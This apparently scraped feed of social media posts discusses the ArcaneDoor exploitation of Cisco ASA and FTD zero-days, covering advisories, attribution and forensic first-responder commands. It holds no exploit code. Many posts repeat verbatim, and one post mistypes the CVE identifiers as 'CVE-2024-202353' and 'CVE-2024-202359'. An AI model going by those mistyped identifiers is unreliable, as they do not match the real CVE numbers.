HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog

See original toot above for information on the Cisco exploited zero-days.

#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog

Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.

#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel

The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.

It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.

#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw

The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.

As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.

www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs

#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV

So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
3. Collect the outputs of the following commands:
   • show version
   • verify /SHA-512 system:memory/text
   • debug menu memory 8
4. Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity

Final question for anyone still reading: why the debug menu memory 8? What does it do?

I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:

• Line Runner (PDF)
• Line Dancer (PDF)

cc: @todb @campuscodi @mttaggart @DaveMWilburn

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

The #Cisco vulns today smack a little of the Barracuda ones last year.

I really hope we don't end at "Toss these ASAs into a volcano."

#CVE_2024_20353 #CVE_2024_20359

@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart

HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog

See original toot above for information on the Cisco exploited zero-days.

#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

• Cisco Adaptive Security Appliance (ASA) Software
• Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

• Cisco Adaptive Security Appliance (ASA) Software
• Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity

Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.

#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel

The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.

It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.

#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw

The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.

As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.

www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs

#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV

So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
3. Collect the outputs of the following commands:
   • show version
   • verify /SHA-512 system:memory/text
   • debug menu memory 8
4. Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity

Final question for anyone still reading: why the debug menu memory 8? What does it do?

I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:

• Line Runner (PDF)
• Line Dancer (PDF)

cc: @todb @campuscodi @mttaggart @DaveMWilburn

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

The #Cisco vulns today smack a little of the Barracuda ones last year.

I really hope we don't end at "Toss these ASAs into a volcano."

#CVE_2024_20353 #CVE_2024_20359

@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart

HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog

See original toot above for information on the Cisco exploited zero-days.

#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog

Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.

#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel

The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.

It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.

#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw

The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.

As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.

www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs

#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV

So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
3. Collect the outputs of the following commands:
   • show version
   • verify /SHA-512 system:memory/text
   • debug menu memory 8
4. Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity

Final question for anyone still reading: why the debug menu memory 8? What does it do?

I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:

• Line Runner (PDF)
• Line Dancer (PDF)

cc: @todb @campuscodi @mttaggart @DaveMWilburn

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

The #Cisco vulns today smack a little of the Barracuda ones last year.

I really hope we don't end at "Toss these ASAs into a volcano."

#CVE_2024_20353 #CVE_2024_20359

@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart

HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog

See original toot above for information on the Cisco exploited zero-days.

#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

• Cisco Adaptive Security Appliance (ASA) Software
• Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

• Cisco Adaptive Security Appliance (ASA) Software
• Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity

Multiple government agencies has published an advisory on an ongoing APT campaign targeting Cisco ASA / FTD devices using post-auth RCE bug CVE-2024-20359 and CVE-2024-20358.

They don't know how the attackers initially got in.

Important note from the research published by Cisco Talos calling the APT operation* "ArcaneDoor":

> We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date. Our investigation is ongoing, and we will provide updates, if necessary, in the security advisories or on this blog.

https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

ArcaneDoor Attack (CVE-2024-20353 and CVE-2024-20359) https://fortiguard.fortinet.com/threat-signal-report/5429

Hackers backdoored Cisco ASA devices via two zero-days (CVE-2024-20353, CVE-2024-20359) https://www.helpnetsecurity.com/2024/04/24/cve-2024-20353-cve-2024-20359/ #government-backedattacks #securityupdate #Don'tmiss #Microsoft #Hotstuff #firewall #0-day #Cisco #Lumen #News #CISA #NCSC

@GossiTheDog Here are the CVE security advisories:

• CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
• CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability

🚨🚨 two zero days in Cisco ASA AnyConnect under exploitation since last year

CVE-2024-20353 and CVE-2024-20359

https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#threatintel #ArcaneDoor

Wake up babe, new Cisco actively exploited zero days just dropped:

• CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
• CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability

Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.

See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak

See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart

Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog

EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:

• Line Runner (PDF) https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/line/ncsc-tip-line-runner.pdf
• Line Dancer (PDF) https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/line/ncsc-tip-line-dancer.pdf

cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig

#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #KnownExploitedVulnerabilitiesCatalog #CISA #UAT4356 #threatintel #IOC

Multiple government agencies has published an advisory on an ongoing APT campaign targeting Cisco ASA / FTD devices using post-auth RCE bug CVE-2024-20359 and CVE-2024-20358.

They don't know how the attackers initially got in.

Important note from the research published by Cisco Talos calling the APT operation* "ArcaneDoor":

> We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date. Our investigation is ongoing, and we will provide updates, if necessary, in the security advisories or on this blog.

https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

@GossiTheDog Here are the CVE security advisories:

• CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
• CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability

🚨🚨 two zero days in Cisco ASA AnyConnect under exploitation since last year

CVE-2024-20353 and CVE-2024-20359

https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#threatintel #ArcaneDoor

Wake up babe, new Cisco actively exploited zero days just dropped:

• CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
• CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability

Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.

See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak

See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart

Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog

EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:

• Line Runner (PDF) https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/line/ncsc-tip-line-runner.pdf
• Line Dancer (PDF) https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/line/ncsc-tip-line-dancer.pdf

cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig

#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #KnownExploitedVulnerabilitiesCatalog #CISA #UAT4356 #threatintel #IOC

Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.

#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel

The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.

It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.

#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw

